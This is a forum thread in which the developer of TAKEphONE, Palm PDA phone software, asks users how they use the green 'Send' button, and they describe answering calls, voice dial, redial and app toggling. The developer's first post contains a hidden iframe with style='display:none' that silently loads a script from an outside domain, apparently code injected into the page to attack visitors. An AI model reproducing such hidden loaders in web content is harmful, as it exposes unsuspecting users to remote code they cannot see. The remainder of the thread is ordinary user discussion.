+ Reply to Thread
Page 1 of 2 1 2 LastLast

"Send" (Green) button functions

Hi all,

In previous versions of my TAKEphONE s/w, I have used the "Send" button (green phone icon) to initiate dialing.

This caused conflict on some conditions, when the users needed that button to do something else - for example - answer an incoming call. So I removed it.

I now want to try and get it back, so I need your help:

I need to know EVERY possible use of that button, and what are the consditions for that use !

Any input will be appreciated !<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Shimon Shnitzer
    Maker of TAKEphONE -
    "Take telephony into your Palm"

Well answering calls shouldn't effect it. Reason is, when an incoming call comes in, the PDA turns over to the phone application. The only reason I could see it being a problem a=is if the user hits send on the incoming call before it switches over to the Phone application.

Can't think of a thing. Never had to use it for anything other then "Send" when I have Takephone in play and even then more often then not, after I've done a search and found my phone record I merely hit the "Ok" button and it dials.

In addition to answering calls, the send button will take you from the palm side of the phone to the phone side. You need to be on the phone side of the device in order to make phone calls using the key pad.

Originally posted by RMSko
    In addition to answering calls, the send button will take you from the palm side of the phone to the phone side. You need to be on the phone side of the device in order to make phone calls using the key pad.
    True, but there are 2 other buttons that do that. No sense is using the send key when the end, and phone icon do the same.

Agreed. I'd hate to lose the red phone button though. (I've reprogrammed that phone icon/grafitti button long ago.)

Hey Shimon!
    Ya still monitoring this thread? Just thought I would resurrect this thread to ask what's the status of bringing the 'Send' button back to initiate calls in TakePhOne. I can seem to break the habit of hitting the send button after searching up an address. Then I'm punching in the numbers manually or switching back to TakePhone to dial with OK. I just seems intuitive to use the send button to initiate a call. What kind of conditions were you trying to avoid?
    mg
    PS: Perhaps the answer was lost in the posts that were eaten in the server crash

I use the send button to initiate voice dial.

Originally posted by Beryl
    Agreed. I'd hate to lose the red phone button though. (I've reprogrammed that phone icon/grafitti button long ago.)
    I learned this from past, but I think you should keep the phone soft button the way it defaults.

Reason: You can toggle between an app and the phone without losing what you were doing with the app. With the red button, all that does is puts you to the phone.. no way to return to where you were.

As for Shimon's green button question, I cannot think of any other app that uses it. It obviously has to be a phone app, and as far I can tell, there is nothing else.

John

Originally posted by zucchero
    I learned this from past, but I think you should keep the phone soft button the way it defaults.

Reason: You can toggle between an app and the phone without losing what you were doing with the app. With the red button, all that does is puts you to the phone.. no way to return to where you were.
    Yep... that is a feature that I have been using often!
    Please visit my picture site: Robert-O-Rama :)

What button toggles?

Originally posted by Walcwlr
    What button toggles?
    The soft phone button, in the upper right of the graffiti area. If you go to the phone dialer app using the red or green phone buttons (or the soft phone button), you can get back to whatever app you were running, at the state you left it, by tapping on the soft phone button. It's pretty nice, for instance, when working on a native Excel file in Quicksheet.
    Please visit my picture site: Robert-O-Rama :)

Somehow, something I installed changed the behavior of the Graffiti area phone icon; now it just goes back to the main PDA screen. I think it was Megacalc that was the culprit.

What can I use to get it back to the default? The toggle feature would be handy...

Originally posted by Kelso
    Somehow, something I installed changed the behavior of the Graffiti area phone icon; now it just goes back to the main PDA screen. I think it was Megacalc that was the culprit.

What can I use to get it back to the default? The toggle feature would be handy...
    Before suspecting an application made the change, go to the "Buttons" section of the "Prefs PDA" application. Check the setting for the soft phone button in there first. It may be as simple as setting that back to "Phone" to achieve what you want.
    Michael

Originally posted by Tripster
    I use the send button to initiate voice dial.
    Yeah I use the soft phone app on the grafitti screen all the time to toggle back into what ever app I was in before being interrupted by what ever phonecall just came in. That was a great tip somebody posted long ago when we were all discovering the phone, but...

Getting back to the topic... If I have a number displayed and highlighted when I hit the green phone button it just takes me to the phone side but doesn't dial the number. I'm using version 5.05c and I couldn't find anything in the prefs that related to turning that feature on or off and I'm pretty much running with the default settings and no hacks installed. Tripster did you do anything special to make that work.
    mg

MGuzzy,

when I have a number highlighted in a separate app., and i hit the green send button, that number dials

for voice dial, make sure you've trained a number to a voice command like saying "voicemail" under prefsphone application and assigning it to your number, i use XXX-XXXX,#PPPP where X is the phone number, P is the password, the comma is a delay and pound is required by my service provider to get into voicemail

whenever the phone app is running, ie after hitting phone power button once, you get main menu: recent calls, etc...

hitting the green button once starts the voice recognizer...

hitting the green button a second time redials the last number called

closing the flip immediately after voicedial allows you to have a conversation with the flip closed

Originally posted by Tripster
    MGuzzy,

when I have a number highlighted in a separate app., and i hit the green send button, that number dials

for voice dial, make sure you've trained a number to a voice command like saying "voicemail" under prefsphone application and assigning it to your number, i use XXX-XXXX,#PPPP where X is the phone number, P is the password, the comma is a delay and pound is required by my service provider to get into voicemail

whenever the phone app is running, ie after hitting phone power button once, you get main menu: recent calls, etc...

hitting the green button once starts the voice recognizer...

hitting the green button a second time redials the last number called

closing the flip immediately after voicedial allows you to have a conversation with the flip closed
    I guess I should have been more specific. I was refering to initiating a call from the TakephOne app after displaying the results of a search on the find tab. I can launch the call with a press of the OK button or a tap of the stylus. But the green send button only takes me back to phone side dialer app. I think this is what Shimon was refering to in his initial post on the thread.
    Initiating a call from another app requires the TakePhoneHack. Since I don't have any hacks loaded, I haven't tried that feature.
    Hey Shimmy where are you? Perhaps I'll have to cross post in the "other" Takephone thread to get his attention (sorry mods, I'll make it look like a new post heh heh..).
    mg

Originally posted by MGuzzy
    Hey Shimmy where are you? Perhaps I'll have to cross post in the "other" Takephone thread to get his attention (sorry mods, I'll make it look like a new post heh heh..).
    mg
    I am here...

But I guess I am too old (or tired) to understand.
    Can someone rephrase the question here ?
    Shimon Shnitzer
    Maker of TAKEphONE -

Ah yess...
    On the 7135 the green send button will not initiate a call from the Takephone app. Instead it displays the phone side dialer. for example if I search for a name on the find tab I can launch the call with a press of the OK button or a tap of the stylus. But the green send button only takes me back to phone side dialer app. I don't know if I missed a preference somewhere. I'm using version 5.05c. Thanks in advance.
    mg

Originally posted by MGuzzy
    Ah yess...
    On the 7135 the green send button will not initiate a call from the Takephone app. Instead it displays the phone side dialer. for example if I search for a name on the find tab I can launch the call with a press of the OK button or a tap of the stylus. But the green send button only takes me back to phone side dialer app. I don't know if I missed a preference somewhere. I'm using version 5.05c. Thanks in advance.
    mg
    Hi,

Well - this is an on-going issue.
    As you see from this thread - the Green button has several other uses by different users.
    I like to define it as a "PHONE-related" button (as opposed to a "PDA-related" button).

I made it a rule NOT to touch the "PHONE-related" buttons, because they may have other functions (such as answering an incoming call, etc.)
    Shimon Shnitzer
    Maker of TAKEphONE -